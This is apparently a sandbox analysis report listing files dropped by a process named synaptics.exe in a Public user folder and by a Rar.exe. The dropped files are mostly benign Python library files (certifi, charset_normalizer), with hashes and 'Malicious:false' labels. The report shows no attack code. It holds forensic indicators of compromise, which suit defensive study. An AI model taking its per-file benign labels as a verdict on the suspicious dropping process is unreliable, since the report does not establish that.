                                                                                                                                                                                      SHA-256:A910C31725D52704C1FC49A81A9A5A5D4FD1F6A099BE197E133C4F32E5779D30
                                                                                                                                                                                      SHA-512:BD979394AF16B7B62490ED580883763533121379428E8CE824C766B3AA0CD5FABD095BEBF76561C23BE14080446975B8198FED81F1FD401690D27B9BA06DE6E8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import sys.import atexit..def exit_cacert_ctx() -> None:. _CACERT_CTX.__exit__(None, None, None) # type: ignore[union-attr]...if sys.version_info >= (3, 11):.. from importlib.resources import as_file, files.. _CACERT_CTX = None. _CACERT_PATH = None.. def where() -> str:. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it retu
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1568
                                                                                                                                                                                      Entropy (8bit):5.709452859356648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:oV4U0b8ybWPxg+QQMzy/ClB3N/PLo3bIB3Nvh4VMhGlXwu+H2C/4PvBGJOcug/BA:A4jbqjQtyat/c2vhCMhju/C/yv+K2eUy
                                                                                                                                                                                      MD5:6A2C7AC20CDFA210BF2BE6A9242CAE14
                                                                                                                                                                                      SHA1:AC8E8A1D9B4C39813EE3D77088A49A5B9DF8CE3D
                                                                                                                                                                                      SHA-256:2C4C72594F11E38674EA85E75EAA410405439D21DFD92F8B65AD9ACE8A921F01
                                                                                                                                                                                      SHA-512:CB6713602BAD7FBD464FAD0A1E6BB6D60339F98B900029F0ECFD1455054FEBF206DEEC6BA5647AFC2DF397EAFCED8478880F2AA2FDF89FEBA33884FA28418ABF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11385
                                                                                                                                                                                      Entropy (8bit):5.821640867954899
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:OWeJLd8V6fySfPAraft774k4M1Cz9ZZERmOBJnCTrFkYAr64BpmA+ifAgQSK5FQm:OWeJLdcS7ft77cZZaLnCvNm64mA+ifA9
                                                                                                                                                                                      MD5:983C6602469917B07BE91A3470625875
                                                                                                                                                                                      SHA1:FE9E447441B16B40662CEB1A98CB7408B025BB2C
                                                                                                                                                                                      SHA-256:F9BB8EC9004A94D07BD22FA0D8E5918A2BBB76DB28C1F98B8E1ED7DA8DC38722
                                                                                                                                                                                      SHA-512:72FF2A71CCE2AEACFAE8CEEFEEE9C9BE48BB00D63512492395B799E462CD1B955535A41576965E95434993691EF5C78B66CB071932075AE289D5A35B5523733C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9646
                                                                                                                                                                                      Entropy (8bit):5.5173709961220645
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6q59eApoIRl8if8rZ+IjfsmspqbQO0opPc7HPM4pOfXntTatDlA5u4ZBTWm:V5FTf8rkmypO0iPc7Hk4pOfXnQJlYuOB
                                                                                                                                                                                      MD5:95332C512D3C08D71872DDE640372179
                                                                                                                                                                                      SHA1:6184FC2DEC17CB31640D174D59BAA2C90BA7CB68
                                                                                                                                                                                      SHA-256:28BC1A24776BD14D202015C169EB80A18A8D62089E3B6817C59C49CECF0971C7
                                                                                                                                                                                      SHA-512:49F115EAA62100360C48684A59022074CCEB7290B9C8222AB84B07A4AEE69C9E918F7CC108E45F5E7EC1674BFFA6601C6C24D16A4A4293503C39147FDFC7AB4B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30434
                                                                                                                                                                                      Entropy (8bit):5.881610823760447
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:qvZKN0taqbKcwF7wuCDa5NIbpp2dmnFu3GJusAVlufzR7c:qvZ6EKcR7G3uP8g8luft7c
                                                                                                                                                                                      MD5:184B146FDAEB47592DDE6520CC769D2C
                                                                                                                                                                                      SHA1:B26619E2090A772EB7885D35EA13AB8DA9DCA146
                                                                                                                                                                                      SHA-256:7F0886D55A682379AB50FFF670502F2C76B5F3AA0C50511B72E09E1675591CF9
                                                                                                                                                                                      SHA-512:1CD5C3149BCBB62D248F019BC6633FBE513B6BFCC3B4A32920B2B180AE5A31145FD6BDA8094ABD7FFF7D36259E41E5B719990C71ED65EE9227602C106CED8AA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1834
                                                                                                                                                                                      Entropy (8bit):5.510079891018974
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:owwE8mcebSh3Ue75yubxeNOhsV4Me+NK29:owAmcebSyo5yc4NFV4Me+Nn
                                                                                                                                                                                      MD5:CE5739AC4A83CF18DDE2541086918D91
                                                                                                                                                                                      SHA1:CE199819AEA1EAC78114C477AF2568D892F17256
                                                                                                                                                                                      SHA-256:9DD8259AAB877C489B141B8F9E31D4BA829AF873FF8A7CC8AF8893773F58FD25
                                                                                                                                                                                      SHA-512:EDB71150D04678FA92E8EE35704AA062E9500A050FCE9C331A321A1EBE39F506FA66D5C54529D7C030B272D8377538A4145DFEBEE479C6B7F9F6D82FC12022D4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11529
                                                                                                                                                                                      Entropy (8bit):5.174314918222234
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:N3OucwM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:NeuvM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                      MD5:9B0C0FCAF5CB5FF7C0D4D23E83DE35A3
                                                                                                                                                                                      SHA1:7137C75E29FADCB8E8AE6A4279805D6EB86C3E0C
                                                                                                                                                                                      SHA-256:E03827CFFB94785EB9C72A2F1CA5BCD342FF6A8197237FA7614BA1C69917DBD6
                                                                                                                                                                                      SHA-512:E25D99A30A6A055F2C3403604157964DC98D81D6549BFDBA26ED42CEB9C52442B9CE10AF4EEB2F34B40E03AFC0CFDAF3FD47229CAA01360BE52E0A35B4658F6D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8910
                                                                                                                                                                                      Entropy (8bit):5.468569742044088
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:HnaWkveyNwQTpaKOvKDqBd9KkzZYozi7WHLuo8+bautNZo87Yf2sfGdrB6bQPTIT:kvk+DqBNzk7yuoXbvLZDYfhGdpr4FFv
                                                                                                                                                                                      MD5:8E583B0A3D9CF5F04EBAB23E1351B63E
                                                                                                                                                                                      SHA1:C82BF7D3DCABF3329386A607CAB4AF23509A7F49
                                                                                                                                                                                      SHA-256:B84FAC0DC08B16AAC4072CED7151B2C8A5D6701900DB7105728E9E81E5245E9A
                                                                                                                                                                                      SHA-512:594DF43E72B8317B496155894D42BFD260CC37B5749D0BE56AE4D5FDBEF1BB8461DA9F2298568E1977B4626C944D4AA87350BE9D984778D2BD6C940E88EC7754
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                      Entropy (8bit):5.300756479627271
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/BGt/z/Oszurb64bJf+uaHxEM9ArsQx6G3D8Isi:CQ/z/OsJaJwlBQ8GT8Iv
                                                                                                                                                                                      MD5:E4000410CF40C2B2FA3F2491B04A9B58
                                                                                                                                                                                      SHA1:491ECDE66A6F7BDE1E8CE10E5F23410AE7F1FF0D
                                                                                                                                                                                      SHA-256:2AB5CA783723F2BB0186DFEAA70B8562FB3FB9730F64D8443B0E31E52884A37E
                                                                                                                                                                                      SHA-512:D4DCD22266C7A62ECE27DE4327D915CE0F8766E458F434516AED6C42A8E76EDAA0295A20A466F6F3211B4FA13BCBB8AE5E0A0F3A55876DB82D8F9784549FE7CD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....LC:\Users\Public\QExvbmVOb25l\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21723
                                                                                                                                                                                      Entropy (8bit):4.344893314336944
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:p2x1hvkZ+5NKZOptbYe5pNjxaC6FeMLMNIo7g7ZSKF:Ax1hcZ+5N/pJPpNjn6FeNb7cZSKF
                                                                                                                                                                                      MD5:3DCEEAA50D7F4FECF99A18787955C802
                                                                                                                                                                                      SHA1:298156169704CF6F1E34722625D029AA0A4D3F24
                                                                                                                                                                                      SHA-256:A852F47EB52B71F718109986A6AA09E007FAF13A15B9EDDFE522B5829F140B94
                                                                                                                                                                                      SHA-512:AC1F37A7BDD8E7DBFBE6F4F242D30E2D8F72F80B1708D69360C841BDB756B7BCAFEBB4DED5BF24EC1AA3FBD85370F6BA63D7CAB5C42B9B12AAAFB91B06596C83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import logging..from os import PathLike..from typing import BinaryIO, List, Optional, Set, Union....from .cd import (.. coherence_ratio,.. encoding_languages,.. mb_encoding_languages,.. merge_coherence_ratios,..)..from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE..from .md import mess_ratio..from .models import CharsetMatch, CharsetMatches..from .utils import (.. any_specified_encoding,.. cut_sequence_chunks,.. iana_name,.. identify_sig_or_bom,.. is_cp_similar,.. is_multi_byte_encoding,.. should_strip_sig_or_bom,..)....# Will most likely be controversial..# logging.addLevelName(TRACE, "TRACE")..logger = logging.getLogger("charset_normalizer")..explain_handler = logging.StreamHandler()..explain_handler.setFormatter(.. logging.Formatter("%(asctime)s | %(levelname)s | %(message)s")..)......def from_bytes(.. sequences: Union[bytes, bytearray],.. steps: int = 5,.. chunk_size: int = 512,.. threshold: float = 0.2,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12955
                                                                                                                                                                                      Entropy (8bit):4.565085883136704
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:auWIiX1vR2Yf2bb6WjCKJdnZsisOQ07Tzfh+3gnfmus+rt5E/t7RV:ayiXF+Pp7Tzfh+wnfmufrt5E/t7RV
                                                                                                                                                                                      MD5:743B974C6FFEB35D433C276B344A1140
                                                                                                                                                                                      SHA1:F1CA137C1BA5049C0AB7661DE0E66F4C51F03DD8
                                                                                                                                                                                      SHA-256:61F937B1B79ED17AA8D7EBE64186CEA8CE75F926A35CF2F31551BCF674EC6737
                                                                                                                                                                                      SHA-512:26497E2EFA6761838067810097FE8B355AB5E838C3DBA908EA0240B158CB47B13717942B32F15A9AE8B3EBAFE2029412B9A777C7485F91A48A03D1892EBACE64
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import importlib..from codecs import IncrementalDecoder..from collections import Counter..from functools import lru_cache..from typing import Counter as TypeCounter, Dict, List, Optional, Tuple....from .constant import (.. FREQUENCIES,.. KO_NAMES,.. LANGUAGE_SUPPORTED_COUNT,.. TOO_SMALL_SEQUENCE,.. ZH_NAMES,..)..from .md import is_suspiciously_successive_range..from .models import CoherenceMatches..from .utils import (.. is_accentuated,.. is_latin,.. is_multi_byte_encoding,.. is_unicode_range_secondary,.. unicode_range,..)......def encoding_unicode_range(iana_name: str) -> List[str]:.. """.. Return associated unicode ranges in a single byte code page... """.. if is_multi_byte_encoding(iana_name):.. raise IOError("Function not supported on multi-byte code page").... decoder = importlib.import_module(.. "encodings.{}".format(iana_name).. ).IncrementalDecoder.... p: IncrementalDecoder = decoder(errors="ignore").. seen_ran
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):106
                                                                                                                                                                                      Entropy (8bit):4.336412994117974
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1L6jZKXRYF0AaUFvLzaqDFoNW/kJM7RActNL4op:1Lu0BgounD6WsJM7ZtZ4op
                                                                                                                                                                                      MD5:FAC8FDA8B9C67E4FE079EB2B712EA666
                                                                                                                                                                                      SHA1:DCA37B0BF798ABC6801A97100549400939882371
                                                                                                                                                                                      SHA-256:08EC0FF1F2B6A9BBA574C7A6DA52FCD4989E63E3C80361B6199E487403CC3C50
                                                                                                                                                                                      SHA-512:01EBCBA22F54C86A9C4B7093523C1729917E097C29F626F6940AA71AA39622AE5D8DFB2272AF0ED64976795477B3ED1E881EA2FB9B17612664E60C28AC454DEA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from .__main__ import cli_detect, query_yes_no....__all__ = (.. "cli_detect",.. "query_yes_no",..)..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10040
                                                                                                                                                                                      Entropy (8bit):4.016136127999308
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ZVqYUPQuTDuX0gWP7EkjzetFJltUlHHiThp:ZVqYUP5DD7EG+FJltUlcH
                                                                                                                                                                                      MD5:736969E9EFF624D9D34708313644E6F6
                                                                                                                                                                                      SHA1:A69D7BF335809168C95DE7818DE592F2E47AC996
                                                                                                                                                                                      SHA-256:AECF9C062A41CEBEDDD1301A51AD271B8AAB8D785D75D782541F9FE97B7FC12D
                                                                                                                                                                                      SHA-512:91A2E0F161502AE170A0E1708C02C5968D06A1B27E401D021A5D4F55D04B9A6F12E4BAF563290B95699151D10DC58ADD3732AFA40A0554E730139911EB46A8F2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import argparse..import sys..from json import dumps..from os.path import abspath, basename, dirname, join, realpath..from platform import python_version..from typing import List, Optional..from unicodedata import unidata_version....import charset_normalizer.md as md_module..from charset_normalizer import from_fp..from charset_normalizer.models import CliDetectionResult..from charset_normalizer.version import __version__......def query_yes_no(question: str, default: str = "yes") -> bool:.. """Ask a yes/no question via input() and return their answer..... "question" is a string that is presented to the user... "default" is the presumed answer if the user just hits <Enter>... It must be "yes" (the default), "no" or None (meaning.. an answer is required of the user)..... The "answer" return value is True for "yes" or False for "no"..... Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input.. """.. vali
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):151
                                                                                                                                                                                      Entropy (8bit):4.923660846981479
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:JSxYEVoC2gxAxCKKFuGA0jpSHEeGMMrMePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcrNB96W2y+Bk
                                                                                                                                                                                      MD5:18D27E199B0D26EF9B718CE7FF5A8927
                                                                                                                                                                                      SHA1:EA9C9BFC82AD47E828F508742D7296E69D2226E4
                                                                                                                                                                                      SHA-256:2638CE9E2500E572A5E0DE7FAED6661EB569D1B696FCBA07B0DD223DA5F5D224
                                                                                                                                                                                      SHA-512:B8504949F3DDF0089164B0296E8371D7DCDD4C3761FB17478994F5E6943966528A45A226EBA2D5286B9C799F0EB8C99BD20CBD8603A362532B3A65DD058FA42E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):868
                                                                                                                                                                                      Entropy (8bit):4.508866310558911
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1mveEaF+vqnuZ9UeAlFYdsyGF66xorAqv:/LcsYdsye66+rf
                                                                                                                                                                                      MD5:813A3685E48B6DC4359ACF6EDE226D5F
                                                                                                                                                                                      SHA1:D4AF52A5C4F468358F49FE8CF0A91586958B9F91
                                                                                                                                                                                      SHA-256:30FA8D0CB65B5EA19A35D5F1005862A853CA1105E3BB68CD42109ECBAFB97893
                                                                                                                                                                                      SHA-512:9BF3422A73153476A88A02C0692E7E831B754D2FFA9858F1D4EF36EB1D9F33654672DEF22C8A0F392D9254FE64D66557AAD964923162B080DE6542B5A2E54952
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
